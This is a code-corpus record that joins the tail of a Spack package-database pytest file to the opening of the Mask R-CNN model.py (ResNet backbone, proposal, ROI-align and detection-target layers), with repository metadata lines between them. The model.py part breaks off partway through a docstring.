f.write(json.dumps(db_obj))
record = spack.store.db.get_record(s)
assert record.path is None
assert record.spec._prefix is None
assert record.spec.prefix == record.spec.external_path
def test_uninstall_by_spec(mutable_database):
with mutable_database.write_transaction():
for spec in mutable_database.query():
if spec.package.installed:
spack.package.PackageBase.uninstall_by_spec(spec, force=True)
else:
mutable_database.remove(spec)
assert len(mutable_database.query()) == 0
def test_query_unused_specs(mutable_database):
# This spec installs a fake cmake as a build only dependency
s = spack.spec.Spec('simple-inheritance')
s.concretize()
s.package.do_install(fake=True, explicit=True)
unused = spack.store.db.unused_specs
assert len(unused) == 1
assert unused[0].name == 'cmake'
@pytest.mark.regression('10019')
def test_query_spec_with_conditional_dependency(mutable_database):
# The issue is triggered by having dependencies that are
# conditional on a Boolean variant
s = spack.spec.Spec('hdf5~mpi')
s.concretize()
s.package.do_install(fake=True, explicit=True)
results = spack.store.db.query_local('hdf5 ^mpich')
assert not results
@pytest.mark.regression('10019')
def test_query_spec_with_non_conditional_virtual_dependency(database):
# Ensure the same issue doesn't come up for virtual
# dependency that are not conditional on variants
results = spack.store.db.query_local('mpileaks ^mpich')
assert len(results) == 1
def test_failed_spec_path_error(database):
"""Ensure spec not concrete check is covered."""
s = spack.spec.Spec('a')
with pytest.raises(ValueError, matches='Concrete spec required'):
spack.store.db._failed_spec_path(s)
@pytest.mark.db
def test_clear_failure_keep(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when to be retained."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
s = spack.spec.Spec('a')
spack.store.db.clear_failure(s)
out = capfd.readouterr()[0]
assert 'Retaining failure marking' in out
@pytest.mark.db
def test_clear_failure_forced(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when force."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
# Ensure raise OSError when try to remove the non-existent marking
monkeypatch.setattr(spack.database.Database, 'prefix_failure_marked', _is)
s = spack.spec.Spec('a').concretized()
spack.store.db.clear_failure(s, force=True)
out = capfd.readouterr()[1]
assert 'Removing failure marking despite lock' in out
assert 'Unable to remove failure marking' in out
@pytest.mark.db
def test_mark_failed(mutable_database, monkeypatch, tmpdir, capsys):
"""Add coverage to mark_failed."""
def _raise_exc(lock):
raise lk.LockTimeoutError('Mock acquire_write failure')
# Ensure attempt to acquire write lock on the mark raises the exception
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise_exc)
with tmpdir.as_cwd():
s = spack.spec.Spec('a').concretized()
spack.store.db.mark_failed(s)
out = str(capsys.readouterr()[1])
assert 'Unable to mark a as failed' in out
# Clean up the failure mark to ensure it does not interfere with other
# tests using the same spec.
del spack.store.db._prefix_failures[s.prefix]
@pytest.mark.db
def test_prefix_failed(mutable_database, monkeypatch):
"""Add coverage to prefix_failed operation."""
def _is(db, spec):
return True
s = spack.spec.Spec('a').concretized()
# Confirm the spec is not already marked as failed
assert not spack.store.db.prefix_failed(s)
# Check that a failure entry is sufficient
spack.store.db._prefix_failures[s.prefix] = None
assert spack.store.db.prefix_failed(s)
# Remove the entry and check again
del spack.store.db._prefix_failures[s.prefix]
assert not spack.store.db.prefix_failed(s)
# Now pretend that the prefix failure is locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
assert spack.store.db.prefix_failed(s)
def test_prefix_read_lock_error(mutable_database, monkeypatch):
"""Cover the prefix read lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_read', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_read_lock(s):
assert False
def test_prefix_write_lock_error(mutable_database, monkeypatch):
"""Cover the prefix write lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_write_lock(s):
assert False
| 33.177419
| 79
| 0.689076
|
cf79ba7e896156a665b7263fbfbcd91919ff4efa
| 127,142
|
py
|
Python
|
mrcnn/model.py
|
protohaus/Mask_RCNN
|
0e1f64a9d57863f398444e2ba4a2bb547c7c83f6
|
[
"MIT"
] | null | null | null |
mrcnn/model.py
|
protohaus/Mask_RCNN
|
0e1f64a9d57863f398444e2ba4a2bb547c7c83f6
|
[
"MIT"
] | null | null | null |
mrcnn/model.py
|
protohaus/Mask_RCNN
|
0e1f64a9d57863f398444e2ba4a2bb547c7c83f6
|
[
"MIT"
] | null | null | null |
"""
Mask R-CNN
The main Mask R-CNN model implementation.
Copyright (c) 2017 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
"""
import os
import datetime
import re
import math
from collections import OrderedDict
import multiprocessing
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as KL
import tensorflow.keras.layers as KE
import tensorflow.keras.utils as KU
from tensorflow.python.eager import context
import tensorflow.keras.models as KM
from mrcnn import utils
# Requires TensorFlow 2.0+
from distutils.version import LooseVersion
assert LooseVersion(tf.__version__) >= LooseVersion("2.0")
tf.compat.v1.disable_eager_execution()
############################################################
# Utility Functions
############################################################
def log(text, array=None):
"""Prints a text message. And, optionally, if a Numpy array is provided it
prints it's shape, min, and max values.
"""
if array is not None:
text = text.ljust(25)
text += ("shape: {:20} ".format(str(array.shape)))
if array.size:
text += ("min: {:10.5f} max: {:10.5f}".format(array.min(),array.max()))
else:
text += ("min: {:10} max: {:10}".format("",""))
text += " {}".format(array.dtype)
print(text)
class BatchNorm(KL.BatchNormalization):
"""Extends the Keras BatchNormalization class to allow a central place
to make changes if needed.
Batch normalization has a negative effect on training if batches are small
so this layer is often frozen (via setting in Config class) and functions
as linear layer.
"""
def call(self, inputs, training=None):
"""
Note about training values:
None: Train BN layers. This is the normal mode
False: Freeze BN layers. Good when batch size is small
True: (don't use). Set layer in training mode even when making inferences
"""
return super(self.__class__, self).call(inputs, training=training)
def compute_backbone_shapes(config, image_shape):
"""Computes the width and height of each stage of the backbone network.
Returns:
[N, (height, width)]. Where N is the number of stages
"""
if callable(config.BACKBONE):
return config.COMPUTE_BACKBONE_SHAPE(image_shape)
# Currently supports ResNet only
assert config.BACKBONE in ["resnet50", "resnet101"]
return np.array(
[[int(math.ceil(image_shape[0] / stride)),
int(math.ceil(image_shape[1] / stride))]
for stride in config.BACKBONE_STRIDES])
############################################################
# Resnet Graph
############################################################
# Code adopted from:
# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
def identity_block(input_tensor, kernel_size, filters, stage, block,
use_bias=True, train_bn=True):
"""The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',
use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',
use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
x = KL.Add()([x, input_tensor])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block,
strides=(2, 2), use_bias=True, train_bn=True):
"""conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +
'2c', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', use_bias=use_bias)(input_tensor)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)
x = KL.Add()([x, shortcut])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def resnet_graph(input_image, architecture, stage5=False, train_bn=True):
"""Build a ResNet graph.
architecture: Can be resnet50 or resnet101
stage5: Boolean. If False, stage5 of the network is not created
train_bn: Boolean. Train or freeze Batch Norm layers
"""
assert architecture in ["resnet50", "resnet101"]
# Stage 1
x = KL.ZeroPadding2D((3, 3))(input_image)
x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)
x = BatchNorm(name='bn_conv1')(x, training=train_bn)
x = KL.Activation('relu')(x)
C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x)
# Stage 2
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)
C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)
# Stage 3
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)
C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)
# Stage 4
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)
block_count = {"resnet50": 5, "resnet101": 22}[architecture]
for i in range(block_count):
x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)
C4 = x
# Stage 5
if stage5:
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)
C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)
else:
C5 = None
return [C1, C2, C3, C4, C5]
############################################################
# Proposal Layer
############################################################
def apply_box_deltas_graph(boxes, deltas):
"""Applies the given deltas to the given boxes.
boxes: [N, (y1, x1, y2, x2)] boxes to update
deltas: [N, (dy, dx, log(dh), log(dw))] refinements to apply
"""
# Convert to y, x, h, w
height = boxes[:, 2] - boxes[:, 0]
width = boxes[:, 3] - boxes[:, 1]
center_y = boxes[:, 0] + 0.5 * height
center_x = boxes[:, 1] + 0.5 * width
# Apply deltas
center_y += deltas[:, 0] * height
center_x += deltas[:, 1] * width
height *= tf.exp(deltas[:, 2])
width *= tf.exp(deltas[:, 3])
# Convert back to y1, x1, y2, x2
y1 = center_y - 0.5 * height
x1 = center_x - 0.5 * width
y2 = y1 + height
x2 = x1 + width
result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out")
return result
def clip_boxes_graph(boxes, window):
"""
boxes: [N, (y1, x1, y2, x2)]
window: [4] in the form y1, x1, y2, x2
"""
# Split
wy1, wx1, wy2, wx2 = tf.split(window, 4)
y1, x1, y2, x2 = tf.split(boxes, 4, axis=1)
# Clip
y1 = tf.maximum(tf.minimum(y1, wy2), wy1)
x1 = tf.maximum(tf.minimum(x1, wx2), wx1)
y2 = tf.maximum(tf.minimum(y2, wy2), wy1)
x2 = tf.maximum(tf.minimum(x2, wx2), wx1)
clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes")
clipped.set_shape((clipped.shape[0], 4))
return clipped
class ProposalLayer(KE.Layer):
"""Receives anchor scores and selects a subset to pass as proposals
to the second stage. Filtering is done based on anchor scores and
non-max suppression to remove overlaps. It also applies bounding
box refinement deltas to anchors.
Inputs:
rpn_probs: [batch, num_anchors, (bg prob, fg prob)]
rpn_bbox: [batch, num_anchors, (dy, dx, log(dh), log(dw))]
anchors: [batch, num_anchors, (y1, x1, y2, x2)] anchors in normalized coordinates
Returns:
Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)]
"""
def __init__(self, proposal_count, nms_threshold, config=None, **kwargs):
super(ProposalLayer, self).__init__(**kwargs)
self.config = config
self.proposal_count = proposal_count
self.nms_threshold = nms_threshold
def get_config(self):
config = super(ProposalLayer, self).get_config()
config["config"] = self.config.to_dict()
config["proposal_count"] = self.proposal_count
config["nms_threshold"] = self.nms_threshold
return config
def call(self, inputs):
# Box Scores. Use the foreground class confidence. [Batch, num_rois, 1]
scores = inputs[0][:, :, 1]
# Box deltas [batch, num_rois, 4]
deltas = inputs[1]
deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4])
# Anchors
anchors = inputs[2]
# Improve performance by trimming to top anchors by score
# and doing the rest on the smaller subset.
pre_nms_limit = tf.minimum(self.config.PRE_NMS_LIMIT, tf.shape(input=anchors)[1])
ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True,
name="top_anchors").indices
scores = utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
deltas = utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
pre_nms_anchors = utils.batch_slice([anchors, ix], lambda a, x: tf.gather(a, x),
self.config.IMAGES_PER_GPU,
names=["pre_nms_anchors"])
# Apply deltas to anchors to get refined anchors.
# [batch, N, (y1, x1, y2, x2)]
boxes = utils.batch_slice([pre_nms_anchors, deltas],
lambda x, y: apply_box_deltas_graph(x, y),
self.config.IMAGES_PER_GPU,
names=["refined_anchors"])
# Clip to image boundaries. Since we're in normalized coordinates,
# clip to 0..1 range. [batch, N, (y1, x1, y2, x2)]
window = np.array([0, 0, 1, 1], dtype=np.float32)
boxes = utils.batch_slice(boxes,
lambda x: clip_boxes_graph(x, window),
self.config.IMAGES_PER_GPU,
names=["refined_anchors_clipped"])
# Filter out small boxes
# According to Xinlei Chen's paper, this reduces detection accuracy
# for small objects, so we're skipping it.
# Non-max suppression
def nms(boxes, scores):
indices = tf.image.non_max_suppression(
boxes, scores, self.proposal_count,
self.nms_threshold, name="rpn_non_max_suppression")
proposals = tf.gather(boxes, indices)
# Pad if needed
padding = tf.maximum(self.proposal_count - tf.shape(input=proposals)[0], 0)
proposals = tf.pad(tensor=proposals, paddings=[(0, padding), (0, 0)])
return proposals
proposals = utils.batch_slice([boxes, scores], nms,
self.config.IMAGES_PER_GPU)
if not context.executing_eagerly():
# Infer the static output shape:
out_shape = self.compute_output_shape(None)
proposals.set_shape(out_shape)
return proposals
def compute_output_shape(self, input_shape):
return None, self.proposal_count, 4
############################################################
# ROIAlign Layer
############################################################
def log2_graph(x):
"""Implementation of Log2. TF doesn't have a native implementation."""
return tf.math.log(x) / tf.math.log(2.0)
class PyramidROIAlign(KE.Layer):
"""Implements ROI Pooling on multiple levels of the feature pyramid.
Params:
- pool_shape: [pool_height, pool_width] of the output pooled regions. Usually [7, 7]
Inputs:
- boxes: [batch, num_boxes, (y1, x1, y2, x2)] in normalized
coordinates. Possibly padded with zeros if not enough
boxes to fill the array.
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- feature_maps: List of feature maps from different levels of the pyramid.
Each is [batch, height, width, channels]
Output:
Pooled regions in the shape: [batch, num_boxes, pool_height, pool_width, channels].
The width and height are those specific in the pool_shape in the layer
constructor.
"""
def __init__(self, pool_shape, **kwargs):
super(PyramidROIAlign, self).__init__(**kwargs)
self.pool_shape = tuple(pool_shape)
def get_config(self):
config = super(PyramidROIAlign, self).get_config()
config['pool_shape'] = self.pool_shape
return config
def call(self, inputs):
# Crop boxes [batch, num_boxes, (y1, x1, y2, x2)] in normalized coords
boxes = inputs[0]
# Image meta
# Holds details about the image. See compose_image_meta()
image_meta = inputs[1]
# Feature Maps. List of feature maps from different level of the
# feature pyramid. Each is [batch, height, width, channels]
feature_maps = inputs[2:]
# Assign each ROI to a level in the pyramid based on the ROI area.
y1, x1, y2, x2 = tf.split(boxes, 4, axis=2)
h = y2 - y1
w = x2 - x1
# Use shape of first image. Images in a batch must have the same size.
image_shape = parse_image_meta_graph(image_meta)['image_shape'][0]
# Equation 1 in the Feature Pyramid Networks paper. Account for
# the fact that our coordinates are normalized here.
# e.g. a 224x224 ROI (in pixels) maps to P4
image_area = tf.cast(image_shape[0] * image_shape[1], tf.float32)
roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area)))
roi_level = tf.minimum(5, tf.maximum(
2, 4 + tf.cast(tf.round(roi_level), tf.int32)))
roi_level = tf.squeeze(roi_level, 2)
# Loop through levels and apply ROI pooling to each. P2 to P5.
pooled = []
box_to_level = []
for i, level in enumerate(range(2, 6)):
ix = tf.compat.v1.where(tf.equal(roi_level, level))
level_boxes = tf.gather_nd(boxes, ix)
# Box indices for crop_and_resize.
box_indices = tf.cast(ix[:, 0], tf.int32)
# Keep track of which box is mapped to which level
box_to_level.append(ix)
# Stop gradient propogation to ROI proposals
level_boxes = tf.stop_gradient(level_boxes)
box_indices = tf.stop_gradient(box_indices)
# Crop and Resize
# From Mask R-CNN paper: "We sample four regular locations, so
# that we can evaluate either max or average pooling. In fact,
# interpolating only a single value at each bin center (without
# pooling) is nearly as effective."
#
# Here we use the simplified approach of a single value per bin,
# which is how it's done in tf.crop_and_resize()
# Result: [batch * num_boxes, pool_height, pool_width, channels]
pooled.append(tf.image.crop_and_resize(
feature_maps[i], level_boxes, box_indices, self.pool_shape,
method="bilinear"))
# Pack pooled features into one tensor
pooled = tf.concat(pooled, axis=0)
# Pack box_to_level mapping into one array and add another
# column representing the order of pooled boxes
box_to_level = tf.concat(box_to_level, axis=0)
box_range = tf.expand_dims(tf.range(tf.shape(input=box_to_level)[0]), 1)
box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range],
axis=1)
# Rearrange pooled features to match the order of the original boxes
# Sort box_to_level by batch then box index
# TF doesn't have a way to sort by two columns, so merge them and sort.
sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1]
ix = tf.nn.top_k(sorting_tensor, k=tf.shape(
input=box_to_level)[0]).indices[::-1]
ix = tf.gather(box_to_level[:, 2], ix)
pooled = tf.gather(pooled, ix)
# Re-add the batch dimension
shape = tf.concat([tf.shape(input=boxes)[:2], tf.shape(input=pooled)[1:]], axis=0)
pooled = tf.reshape(pooled, shape)
return pooled
def compute_output_shape(self, input_shape):
return input_shape[0][:2] + self.pool_shape + (input_shape[2][-1], )
############################################################
# Detection Target Layer
############################################################
def overlaps_graph(boxes1, boxes2):
"""Computes IoU overlaps between two sets of boxes.
boxes1, boxes2: [N, (y1, x1, y2, x2)].
"""
# 1. Tile boxes2 and repeat boxes1. This allows us to compare
# every boxes1 against every boxes2 without loops.
# TF doesn't have an equivalent to np.repeat() so simulate it
# using tf.tile() and tf.reshape.
b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1),
[1, 1, tf.shape(input=boxes2)[0]]), [-1, 4])
b2 = tf.tile(boxes2, [tf.shape(input=boxes1)[0], 1])
# 2. Compute intersections
b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1)
b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1)
y1 = tf.maximum(b1_y1, b2_y1)
x1 = tf.maximum(b1_x1, b2_x1)
y2 = tf.minimum(b1_y2, b2_y2)
x2 = tf.minimum(b1_x2, b2_x2)
intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0)
# 3. Compute unions
b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1)
b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1)
union = b1_area + b2_area - intersection
# 4. Compute IoU and reshape to [boxes1, boxes2]
iou = intersection / union
overlaps = tf.reshape(iou, [tf.shape(input=boxes1)[0], tf.shape(input=boxes2)[0]])
return overlaps
def detection_targets_graph(proposals, gt_class_ids, gt_boxes, gt_masks, config):
"""Generates detection targets for one image. Subsamples proposals and
generates target class IDs, bounding box deltas, and masks for each.
Inputs:
proposals: [POST_NMS_ROIS_TRAINING, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [MAX_GT_INSTANCES] int class IDs
gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates.
gt_masks: [height, width, MAX_GT_INSTANCES] of boolean type.
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded.
deltas: [TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw))]
masks: [TRAIN_ROIS_PER_IMAGE, height, width]. Masks cropped to bbox
boundaries and resized to neural network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
# Assertions
asserts = [
tf.Assert(tf.greater(tf.shape(input=proposals)[0], 0), [proposals],
name="roi_assertion"),
]
with tf.control_dependencies(asserts):
proposals = tf.identity(proposals)
# Remove zero padding
proposals, _ = trim_zeros_graph(proposals, name="trim_proposals")
gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes")
gt_class_ids = tf.boolean_mask(tensor=gt_class_ids, mask=non_zeros,
name="trim_gt_class_ids")
gt_masks = tf.gather(gt_masks, tf.compat.v1.where(non_zeros)[:, 0], axis=2,
name="trim_gt_masks")
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = tf.compat.v1.where(gt_class_ids < 0)[:, 0]
non_crowd_ix = tf.compat.v1.where(gt_class_ids > 0)[:, 0]
crowd_boxes = tf.gather(gt_boxes, crowd_ix)
gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix)
gt_boxes = tf.gather(gt_boxes, non_crowd_ix)
gt_masks = tf.gather(gt_masks, non_crowd_ix, axis=2)
# Compute overlaps matrix [proposals, gt_boxes]
overlaps = overlaps_graph(proposals, gt_boxes)
# Compute overlaps with crowd boxes [proposals, crowd_boxes]
crowd_overlaps = overlaps_graph(proposals, crowd_boxes)
crowd_iou_max = tf.reduce_max(input_tensor=crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
# Determine positive and negative ROIs
roi_iou_max = tf.reduce_max(input_tensor=overlaps, axis=1)
# 1. Positive ROIs are those with >= 0.5 IoU with a GT box
positive_roi_bool = (roi_iou_max >= 0.5)
positive_indices = tf.compat.v1.where(positive_roi_bool)[:, 0]
# 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds.
negative_indices = tf.compat.v1.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0]
# Subsample ROIs. Aim for 33% positive
# Positive ROIs
positive_count = int(config.TRAIN_ROIS_PER_IMAGE *
config.ROI_POSITIVE_RATIO)
positive_indices = tf.random.shuffle(positive_indices)[:positive_count]
positive_count = tf.shape(input=positive_indices)[0]
# Negative ROIs. Add enough to maintain positive:negative ratio.
r = 1.0 / config.ROI_POSITIVE_RATIO
negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count
negative_indices = tf.random.shuffle(negative_indices)[:negative_count]
# Gather selected ROIs
positive_rois = tf.gather(proposals, positive_indices)
negative_rois = tf.gather(proposals, negative_indices)
# Assign positive ROIs to GT boxes.
positive_overlaps = tf.gather(overlaps, positive_indices)
roi_gt_box_assignment = tf.cond(
pred=tf.greater(tf.shape(input=positive_overlaps)[1], 0),
true_fn=lambda: tf.argmax(input=positive_overlaps, axis=1),
false_fn=lambda: tf.cast(tf.constant([]), tf.int64)
)
roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment)
roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment)
# Compute bbox refinement for positive ROIs
deltas = utils.box_refinement_graph(positive_rois, roi_gt_boxes)
deltas /= config.BBOX_STD_DEV
# Assign positive ROIs to GT masks
# Permute masks to [N, height, width, 1]
transposed_masks = tf.expand_dims(tf.transpose(a=gt_masks, perm=[2, 0, 1]), -1)
# Pick the right mask for each ROI
roi_masks = tf.gather(transposed_masks, roi_gt_box_assignment)
# Compute mask targets
boxes = positive_rois
if config.USE_MINI_MASK:
# Transform ROI coordinates from normalized image space
# to normalized mini-mask space.
y1, x1, y2, x2 = tf.split(positive_rois, 4, axis=1)
gt_y1, gt_x1, gt_y2, gt_x2 = tf.split(roi_gt_boxes, 4, axis=1)
gt_h = gt_y2 - gt_y1
gt_w = gt_x2 - gt_x1
y1 = (y1 - gt_y1) / gt_h
x1 = (x1 - gt_x1) / gt_w
y2 = (y2 - gt_y1) / gt_h
x2 = (x2 - gt_x1) / gt_w
boxes = tf.concat([y1, x1, y2, x2], 1)
box_ids = tf.range(0, tf.shape(input=roi_masks)[0])
masks = tf.image.crop_and_resize(tf.cast(roi_masks, tf.float32), boxes,
box_ids,
config.MASK_SHAPE)
# Remove the extra dimension from masks.
masks = tf.squeeze(masks, axis=3)
# Threshold mask pixels at 0.5 to have GT masks be 0 or 1 to use with
# binary cross entropy loss.
masks = tf.round(masks)
# Append negative ROIs and pad bbox deltas and masks that
# are not used for negative ROIs with zeros.
rois = tf.concat([positive_rois, negative_rois], axis=0)
N = tf.shape(input=negative_rois)[0]
P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(input=rois)[0], 0)
rois = tf.pad(tensor=rois, paddings=[(0, P), (0, 0)])
roi_gt_boxes = tf.pad(tensor=roi_gt_boxes, paddings=[(0, N + P), (0, 0)])
roi_gt_class_ids = tf.pad(tensor=roi_gt_class_ids, paddings=[(0, N + P)])
deltas = tf.pad(tensor=deltas, paddings=[(0, N + P), (0, 0)])
masks = tf.pad(tensor=masks, paddings=[[0, N + P], (0, 0), (0, 0)])
return rois, roi_gt_class_ids, deltas, masks
class DetectionTargetLayer(KE.Layer):
"""Subsamples proposals and generates target box refinement, class_ids,
and masks for each.
Inputs:
proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs.
gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized
coordinates.
gt_masks: [batch, height, width, MAX_GT_INSTANCES] of boolean type
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized
coordinates
target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw)]
target_mask: [batch, TRAIN_ROIS_PER_IMAGE, height, width]
Masks cropped to bbox boundaries and resized to neural
network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
def __init__(self, config, **kwargs):
super(DetectionTargetLayer, self).__init__(**kwargs)
self.config = config
def get_config(self):
config = super(DetectionTargetLayer, self).get_config()
config["config"] = self.config.to_dict()
return config
def call(self, inputs):
proposals = inputs[0]
gt_class_ids = inputs[1]
gt_boxes = inputs[2]
gt_masks = inputs[3]
# Slice the batch and run a graph for each slice
# TODO: Rename target_bbox to target_deltas for clarity
names = ["rois", "target_class_ids", "target_bbox", "target_mask"]
outputs = utils.batch_slice(
[proposals, gt_class_ids, gt_boxes, gt_masks],
lambda w, x, y, z: detection_targets_graph(
w, x, y, z, self.config),
self.config.IMAGES_PER_GPU, names=names)
return outputs
def compute_output_shape(self, input_shape):
return [
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois
(None, self.config.TRAIN_ROIS_PER_IMAGE), # class_ids
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas
(None, self.config.TRAIN_ROIS_PER_IMAGE, self.config.MASK_SHAPE[0],
self.config.MASK_SHAPE[1]) # masks
]
def compute_mask(self, inputs, mask=None):
return [None, None, None, None]
############################################################
# Detection Layer
############################################################
def refine_detections_graph(rois, probs, deltas, window, config):
"""Refine classified proposals and filter overlaps and return final
detections.
Inputs:
rois: [N, (y1, x1, y2, x2)] in normalized coordinates
probs: [N, num_classes]. Class probabilities.
deltas: [N, num_classes, (dy, dx, log(dh), log(dw))]. Class-specific
bounding box deltas.
